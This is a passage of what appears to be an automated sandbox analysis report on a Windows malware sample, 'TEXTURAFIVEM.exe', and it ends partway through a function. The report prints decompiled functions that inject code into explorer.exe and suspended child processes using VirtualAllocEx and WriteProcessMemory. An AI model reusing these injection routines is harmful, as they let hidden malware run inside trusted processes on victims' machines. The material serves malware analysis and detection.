				MSG* _t8;

				_t8 = __eax;
				_t7 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t7 = 1;
					if(_t8->message != 0x12) {
						TranslateMessage(_t8);
						DispatchMessageA(_t8);
					}
				}
				Sleep(1);
				return _t7;
			}





                                    0x004058e2
                                    0x004058e4
                                    0x004058f6
                                    0x004058f8
                                    0x004058fe
                                    0x00405901
                                    0x00405907
                                    0x00405907
                                    0x004058fe
                                    0x0040590e
                                    0x00405917

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction ID: 6e183c8d27a73f5ab686f93293f9443bc1ab9610ab5d407b35826ec629df393a
                                    • Opcode Fuzzy Hash: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction Fuzzy Hash: B9E012B13836147DF63079650C83F9F594C8F02B9AF54453BF201BB2C2C5AA5E0041AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BA84, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
				void* _t7;

				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
				if(GetLastError() != 0xb7) {
					CloseHandle(_t7);
					return 1;
				} else {
					CloseHandle(_t7);
					return 0;
				}
			}




                                    0x0040ba93
                                    0x0040ba9f
                                    0x0040baac
                                    0x0040bab4
                                    0x0040baa1
                                    0x0040baa2
                                    0x0040baaa
                                    0x0040baaa

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    • Opcode ID: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction ID: d02ee9e762f20a6f0fe939e11bc02ca9e1bd7b756de2d39ced16b1d78259e861
                                    • Opcode Fuzzy Hash: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction Fuzzy Hash: 97D0C9A174534035E910B9B51CC3B0E050C875071BFA01837B104BA1D3D67D8601262D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: TEXTURAFIVEM.exe PID: 4024 Parent PID: 3440 TEXTURAFIVEM.exeCOMMON

                                    Executed Functions

                                    Function 0040B3C0, Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 304processthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				char* _t62;
				intOrPtr* _t71;
				intOrPtr _t91;
				intOrPtr* _t99;
				void* _t104;
				intOrPtr* _t113;
				intOrPtr* _t119;
				intOrPtr* _t124;
				intOrPtr _t129;
				intOrPtr* _t137;
				void* _t142;
				intOrPtr* _t151;
				intOrPtr _t159;
				char* _t161;
				struct HWND__* _t163;
				void* _t168;
				intOrPtr _t197;
				intOrPtr _t201;
				intOrPtr _t210;
				intOrPtr _t221;
				void* _t236;
				void* _t239;
				void* _t241;

				_t234 = __edi;
				_t194 = __ecx;
				_t185 = __ebx;
				_push(__ebx);
				_push(__esi);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_push(_t239);
				_push(0x40b7a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239 + 0xffffff90;
				_t58 =  *0x40d1cc; // 0x40e924
				_t236 = E00401F9C(_t58);
				_t60 =  *0x40d210; // 0x40e8ec
				_t241 =  *_t60 - 2;
				if(_t241 != 0) {
					_t61 =  *0x40d210; // 0x40e8ec
					__eflags =  *_t61 - 1;
					if(__eflags != 0) {
						_t62 =  *0x40d1b8; // 0x40e8fc
						__eflags =  *_t62 - 1;
						if( *_t62 == 1) {
							__eflags = 0;
							E004013A4(0,  &_v116);
							E00401E94( *0x40f1e8, _v116);
							if(__eflags != 0) {
								_t194 = E00401F48( *0x40f1e8);
								__eflags = 0;
								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
								E0040AFB0(__ebx, _t85, _t236, 0);
								ExitProcess(0);
							}
						}
						_t197 =  *0x40d21c; // 0x40e8f0
						__eflags = 0;
						E004013A4(0, _t197);
						E00403738();
						E00403738();
						_t71 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
						_t91 =  *0x40d21c; // 0x40e8f0
						E00401B14(_t91, _v112);
						E00403738();
						E00403738();
						_t99 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						__eflags = _t104;
						if(_t104 == 0) {
							_t210 =  *0x40d21c; // 0x40e8f0
							E004013A4(0, _t210);
							E00403738();
							E00403738();
							_t113 =  *0x40d21c; // 0x40e8f0
							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
				} else {
					_t119 =  *0x40d21c; // 0x40e8f0
					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
					E00401E94(_v100, "explorer.exe");
					if(_t241 != 0) {
						_t124 =  *0x40d21c; // 0x40e8f0
						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
						if(__eflags != 0) {
							E00406294( &_v108, _t185, __edi, _t236, __eflags);
							_t129 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t129, _v108);
						} else {
							E004063FC(_v12,  &_v104);
							_t159 =  *0x40d21c; // 0x40e8f0
							E00401B14(_t159, _v104);
						}
						E00403738();
						E00403738();
						_t137 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					} else {
						_t161 =  *0x40d214; // 0x40e8f4
						if( *_t161 != 1) {
							_t163 = FindWindowA("shell_traywnd", 0); // executed
							GetWindowThreadProcessId(_t163,  &_v8);
							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
							__eflags = _t168;
							if(_t168 != 0) {
								_t142 = 1;
							} else {
								E00403738();
								E00403738();
								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
							}
						} else {
							E00403738();
							E00403738();
							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
						}
					}
					if(_t142 == 0) {
						_t221 =  *0x40d21c; // 0x40e8f0
						E004013A4(0, _t221);
						E00403738();
						E00403738();
						_t151 =  *0x40d21c; // 0x40e8f0
						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
					}
				}
				_pop(_t201);
				 *[fs:eax] = _t201;
				_push(E0040B7AF);
				return E00401AE4( &_v116, 5);
			}






































                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c0
                                    0x0040b3c6
                                    0x0040b3c7
                                    0x0040b3ca
                                    0x0040b3cd
                                    0x0040b3d0
                                    0x0040b3d3
                                    0x0040b3d6
                                    0x0040b3db
                                    0x0040b3dc
                                    0x0040b3e1
                                    0x0040b3e4
                                    0x0040b3e7
                                    0x0040b3f1
                                    0x0040b3f3
                                    0x0040b3f8
                                    0x0040b3fb
                                    0x0040b5fd
                                    0x0040b602
                                    0x0040b605
                                    0x0040b6dc
                                    0x0040b6e1
                                    0x0040b6e4
                                    0x0040b6e9
                                    0x0040b6eb
                                    0x0040b6f8
                                    0x0040b6fd
                                    0x0040b715
                                    0x0040b71c
                                    0x0040b71e
                                    0x0040b723
                                    0x0040b72a
                                    0x0040b72a
                                    0x0040b6fd
                                    0x0040b72f
                                    0x0040b735
                                    0x0040b737
                                    0x0040b744
                                    0x0040b751
                                    0x0040b76f
                                    0x0040b77c
                                    0x0040b788
                                    0x0040b60b
                                    0x0040b60e
                                    0x0040b616
                                    0x0040b61b
                                    0x0040b628
                                    0x0040b635
                                    0x0040b653
                                    0x0040b660
                                    0x0040b66c
                                    0x0040b671
                                    0x0040b673
                                    0x0040b679
                                    0x0040b681
                                    0x0040b68e
                                    0x0040b69b
                                    0x0040b6b9
                                    0x0040b6c6
                                    0x0040b6d2
                                    0x0040b6d2
                                    0x0040b673
                                    0x0040b401
                                    0x0040b404
                                    0x0040b40b
                                    0x0040b418
                                    0x0040b41d
                                    0x0040b502
                                    0x0040b50e
                                    0x0040b510
                                    0x0040b52f
                                    0x0040b537
                                    0x0040b53c
                                    0x0040b512
                                    0x0040b518
                                    0x0040b520
                                    0x0040b525
                                    0x0040b525
                                    0x0040b549
                                    0x0040b556
                                    0x0040b574
                                    0x0040b581
                                    0x0040b58d
                                    0x0040b423
                                    0x0040b423
                                    0x0040b42b
                                    0x0040b483
                                    0x0040b489
                                    0x0040b4a4
                                    0x0040b4a9
                                    0x0040b4ab
                                    0x0040b4f8
                                    0x0040b4ad
                                    0x0040b4b5
                                    0x0040b4c2
                                    0x0040b4e2
                                    0x0040b4ee
                                    0x0040b4ee
                                    0x0040b42d
                                    0x0040b435
                                    0x0040b442
                                    0x0040b462
                                    0x0040b46e
                                    0x0040b46e
                                    0x0040b42b
                                    0x0040b594
                                    0x0040b59a
                                    0x0040b5a2
                                    0x0040b5af
                                    0x0040b5bc
                                    0x0040b5da
                                    0x0040b5e7
                                    0x0040b5f3
                                    0x0040b5f3
                                    0x0040b594
                                    0x0040b78f
                                    0x0040b792
                                    0x0040b795
                                    0x0040b7a7

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004040F4, Relevance: 6.1, APIs: 4, Instructions: 100memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _v8;
				intOrPtr _v12;
				char _v13;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				intOrPtr _v36;
				long _v44;
				void* _v48;
				void* _t38;
				void* _t42;
				void* _t49;
				void* _t55;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr* _t80;

				_t80 = _t79 + 0xffffffd4;
				_v12 = __edx;
				_v8 = __eax;
				_t64 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v48, _t64);
				_push(_t79);
				_push(0x404205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t80;
				_v13 = 0;
				_push(0);
				_push(_v12);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
				_t76 = 0x10000000;
				do {
					_t76 = _t76 + 0x10000;
					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
					_t57 = _t38;
					if(_t57 != 0) {
						VirtualFree(_t57, 0, 0x8000); // executed
						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
						_t57 = _t55;
					}
				} while (_t57 == 0 && _t76 <= 0x30000000);
				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
				_t42 = _v48;
				if(_t42 != 0) {
					_v24 = _t42;
					_v20 = _v36;
					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
					if(_t49 != 0) {
						_v13 = 1;
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E0040420C);
				_t68 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v48, _t68);
			}
























                                    0x004040f7
                                    0x004040fd
                                    0x00404100
                                    0x00404106
                                    0x0040410c
                                    0x00404113
                                    0x00404114
                                    0x00404119
                                    0x0040411c
                                    0x0040411f
                                    0x00404128
                                    0x00404129
                                    0x00404130
                                    0x00404134
                                    0x0040413b
                                    0x0040413d
                                    0x00404142
                                    0x00404142
                                    0x00404159
                                    0x0040415e
                                    0x00404162
                                    0x0040416c
                                    0x00404186
                                    0x0040418b
                                    0x0040418b
                                    0x0040418d
                                    0x004041a5
                                    0x004041aa
                                    0x004041af
                                    0x004041b1
                                    0x004041b7
                                    0x004041c8
                                    0x004041dc
                                    0x004041e3
                                    0x004041e5
                                    0x004041e5
                                    0x004041e3
                                    0x004041eb
                                    0x004041ee
                                    0x004041f1
                                    0x004041f9
                                    0x00404204

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403789, Relevance: 3.1, APIs: 2, Instructions: 85memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
				signed char _t26;
				void* _t32;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t46;
				signed int _t49;
				signed char _t55;
				intOrPtr _t58;
				void* _t60;
				signed char* _t61;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;

				_t61 = __edi;
				_t55 = __edx;
				_t49 = __ecx;
				_t48 = __ebx;
				asm("aaa");
				 *__ecx =  *__ecx + __edx;
				_t26 = __eax + 0x00000001 | 0x00000054;
				_push(__ebx);
				if(_t26 == 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					E00401CAC(_t65 - 8, __ebx);
					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
					E00401CAC(_t65 - 0xc, __ebx);
					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
					_pop(_t58);
					 *[fs:eax] = _t58;
					_push(E00403871);
					return E00401AE4(_t65 - 0xc, 2);
				} else {
					_t66 =  *(__esi + 0x67) * 0x61727241;
					if(_t66 < 0) {
						 *_t26 =  *_t26 + _t26;
						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
					}
					asm("adc [eax], al");
					_t43 = _t26 - 1;
					 *_t43 =  *_t43 + _t43;
					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
					 *_t49 =  *_t49 + _t55;
					_push(_t66);
					asm("outsb");
					asm("aaa");
					_t45 = _t43 + 2;
					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
					asm("bound ecx, [ecx+0x6e]");
					asm("outsw");
					asm("adc al, 0x0");
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t61 = _t55;
					_t46 = _t45 + 1;
					 *_t46 =  *_t46 + _t55;
					 *_t46 =  *_t46 + _t46;
					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
					_t60 = 0;
					do {
						_t60 = _t60 + 1;
					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
					return _t60;
				}
			}
















                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x0040378b
                                    0x0040378d
                                    0x0040378f
                                    0x00403790
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869
                                    0x00403792
                                    0x00403792
                                    0x00403799
                                    0x0040379b
                                    0x0040379d
                                    0x0040379d
                                    0x0040379f
                                    0x004037a2
                                    0x004037a3
                                    0x004037a5
                                    0x004037a9
                                    0x004037ab
                                    0x004037ac
                                    0x004037bd
                                    0x004037be
                                    0x004037bf
                                    0x004037c1
                                    0x004037c5
                                    0x004037c8
                                    0x004037ca
                                    0x004037cc
                                    0x004037ce
                                    0x004037d0
                                    0x004037d2
                                    0x004037d4
                                    0x004037d5
                                    0x004037d7
                                    0x004037d9
                                    0x004037dc
                                    0x004037de
                                    0x004037de
                                    0x004037e4
                                    0x004037eb
                                    0x004037eb

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004037EC, Relevance: 3.1, APIs: 2, Instructions: 51memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				void* _t14;
				void* _t26;
				intOrPtr _t33;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t26 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x40386a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E00401CAC( &_v12, __edx);
				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
				E00401CAC( &_v16, _t26);
				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00403871);
				return E00401AE4( &_v16, 2);
			}











                                    0x004037ef
                                    0x004037f1
                                    0x004037f3
                                    0x004037f8
                                    0x004037fa
                                    0x004037fe
                                    0x004037ff
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D04, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				void* _t13;
				intOrPtr _t23;
				void* _t26;

				_v8 = __eax;
				E00401F38(_v8);
				_push(_t26);
				_push(0x405d61);
